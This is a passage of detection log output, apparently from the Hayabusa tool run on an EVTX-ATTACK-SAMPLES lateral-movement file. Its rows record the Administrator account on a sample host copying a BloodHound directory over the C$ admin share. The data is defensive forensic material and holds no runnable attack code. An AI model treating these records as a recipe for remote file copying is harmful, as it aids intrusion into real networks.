10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 